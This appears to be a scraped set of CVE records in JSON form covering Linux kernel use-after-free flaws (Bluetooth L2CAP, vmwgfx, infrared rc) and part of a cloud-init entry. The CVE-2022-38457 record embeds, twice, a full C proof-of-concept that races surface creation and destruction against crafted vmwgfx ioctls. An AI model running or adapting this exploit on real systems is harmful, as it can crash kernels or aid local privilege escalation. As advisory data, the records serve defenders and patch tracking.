"Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability, which was classified as critical, was found in Linux Kernel. Affected is the function l2cap_conn_del of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211944." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-119", "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "shortName": "VulDB" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=42cf46dea905a80f6de218e837ba4d4cc33d6979" }, { "url": "https://vuldb.com/?id.211944" }, { "name": "FEDORA-2022-64ab9153c0", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OD7VWUT7YAU4CJ247IF44NGVOAODAJGC/" }, { "name": "FEDORA-2022-65a0a3504a", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DGOIRR72OAFE53XZRUDZDP7INGLIC3E3/" }, { "name": "FEDORA-2022-7aadaadebc", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XG2UPX3MQ7RKRJEUMGEH2TLPKZJCBU5C/" }, { "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "Linux Kernel Bluetooth l2cap_core.c l2cap_conn_del use after free", "x_generator": "vuldb.com" } }, "cveMetadata": { "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5", "assignerShortName": "VulDB", "cveId": "CVE-2022-3640", "datePublished": "2022-10-21T00:00:00", "dateReserved": "2022-10-21T00:00:00", "dateUpdated": "2024-08-03T01:14:03.216Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-38457
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-17 02:11
Severity ?
EPSS score ?
Summary
There is an UAF vulnerability in vmwgfx driver
References
▼ | URL | Tags |
---|---|---|
https://bugzilla.openanolis.cn/show_bug.cgi?id=2074 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T10:54:03.666Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "Linux", "versions": [ { "lessThan": "5.13.0-52*", "status": "affected", "version": "v4.20-rc1", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "datePublic": "2022-09-06T00:00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ], "exploits": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int handle,int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1; \n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"create_surface failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nhandle=alloc_bo();\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n}" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-09-09T14:39:51", "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "shortName": "Anolis" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074" } ], "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074" ], "discovery": "INTERNAL" }, "title": "There is an UAF vulnerability in vmwgfx driver", "x_generator": { "engine": "Vulnogram 0.0.9" }, "x_legacyV4Record": { "CVE_data_meta": { "AKA": "Anolis", "ASSIGNER": "security@openanolis.org", "DATE_PUBLIC": "2022-09-06T07:00:00.000Z", "ID": "CVE-2022-38457", "STATE": "PUBLIC", "TITLE": "There is an UAF vulnerability in vmwgfx driver" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "kernel", "version": { "version_data": [ { "version_affected": "\u003e=", "version_name": "5.13.0-52", "version_value": "v4.20-rc1" } ] } } ] }, "vendor_name": "Linux" } ] } }, "credit": [ { "lang": "eng", "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab" } ], "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)." } ] }, "exploit": [ { "lang": "en", "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int handle,int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1; \n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"create_surface failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nhandle=alloc_bo();\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n}" } ], "generator": { "engine": "Vulnogram 0.0.9" }, "impact": { "cvss": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H", "version": "3.1" } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-416 Use After Free" } ] } ] }, "references": { "reference_data": [ { "name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074", "refsource": "MISC", "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074" } ] }, "source": { "defect": [ "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074" ], "discovery": "INTERNAL" } } } }, "cveMetadata": { "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e", "assignerShortName": "Anolis", "cveId": "CVE-2022-38457", "datePublished": "2022-09-09T14:39:51.323409Z", "dateReserved": "2022-09-07T00:00:00", "dateUpdated": "2024-09-17T02:11:30.468Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1118
Vulnerability from cvelistv5
Published
2023-03-02 00:00
Modified
2024-08-02 05:32
Severity ?
EPSS score ?
Summary
A flaw use after free in the Linux kernel integrated infrared receiver/transceiver driver was found in the way user detaching rc device. A local user could use this flaw to crash the system or potentially escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:32:46.367Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/29b0589a865b6f66d141d79b2dd1373e4e50fe17" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230413-0003/" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 6.3-rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw use after free in the Linux kernel integrated infrared receiver/transceiver driver was found in the way user detaching rc device. A local user could use this flaw to crash the system or potentially escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/29b0589a865b6f66d141d79b2dd1373e4e50fe17" }, { "url": "https://security.netapp.com/advisory/ntap-20230413-0003/" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1118", "datePublished": "2023-03-02T00:00:00", "dateReserved": "2023-03-01T00:00:00", "dateUpdated": "2024-08-02T05:32:46.367Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-5633
Vulnerability from cvelistv5
Published
2023-10-23 21:58
Modified
2024-09-13 23:28
Severity ?
EPSS score ?
Summary
Kernel: vmwgfx: reference count issue leads to use-after-free in surface handling
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:0113 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0134 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:0461 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1404 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:4823 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:4831 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-5633 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2245663 | issue-tracking, x_refsource_REDHAT |
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-5633", "options": [ { "Exploitation": "None" }, { "Automatable": "No" }, { "Technical Impact": "Total" } ], "role": "CISA Coordinator", "timestamp": "2024-05-09T00:00:00+00:00", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:28:39.386Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T08:07:32.554Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:0113", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0113" }, { "name": "RHSA-2024:0134", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0134" }, { "name": "RHSA-2024:0461", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:4823", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4823" }, { "name": "RHSA-2024:4831", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4831" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-5633" }, { "name": "RHBZ#2245663", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245663" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.11.1.rt7.313.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/o:redhat:enterprise_linux:8::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.11.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.18.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::realtime" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.18.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos", "cpe:/a:redhat:rhel_eus:9.2::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.75.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::nfv", "cpe:/a:redhat:rhel_eus:9.2::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.75.1.rt14.360.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "credits": [ { "lang": "en", "value": "Red Hat would like to thank Murray McAllister (NCC Group APAC) for reporting this issue." } ], "datePublic": "2023-09-28T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "The reference count changes made as part of the CVE-2023-33951 and CVE-2023-33952 fixes exposed a use-after-free flaw in the way memory objects were handled when they were being used to store a surface. When running inside a VMware guest with 3D acceleration enabled, a local, unprivileged user could potentially use this flaw to escalate their privileges." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Important" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T23:28:17.068Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:0113", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0113" }, { "name": "RHSA-2024:0134", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0134" }, { "name": "RHSA-2024:0461", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:0461" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:4823", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4823" }, { "name": "RHSA-2024:4831", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4831" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-5633" }, { "name": "RHBZ#2245663", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245663" } ], "timeline": [ { "lang": "en", "time": "2023-10-23T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-28T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: vmwgfx: reference count issue leads to use-after-free in surface handling", "workarounds": [ { "lang": "en", "value": "This flaw can be mitigated by turning off 3D acceleration in VMware (if possible) or preventing the affected `vmwgfx` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278." } ], "x_redhatCweChain": "CWE-911-\u003eCWE-416: Improper Update of Reference Count leads to Use After Free" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-5633", "datePublished": "2023-10-23T21:58:59.776Z", "dateReserved": "2023-10-18T08:39:18.720Z", "dateUpdated": "2024-09-13T23:28:17.068Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-1786
Vulnerability from cvelistv5
Published
2023-04-26 22:23
Modified
2024-08-02 05:57
Severity ?
EPSS score ?
Summary
sensitive data exposure in cloud-init logs
References
Impacted products
▼ | Vendor | Product |
---|---|---|
Canonical Ltd. | cloud-init |
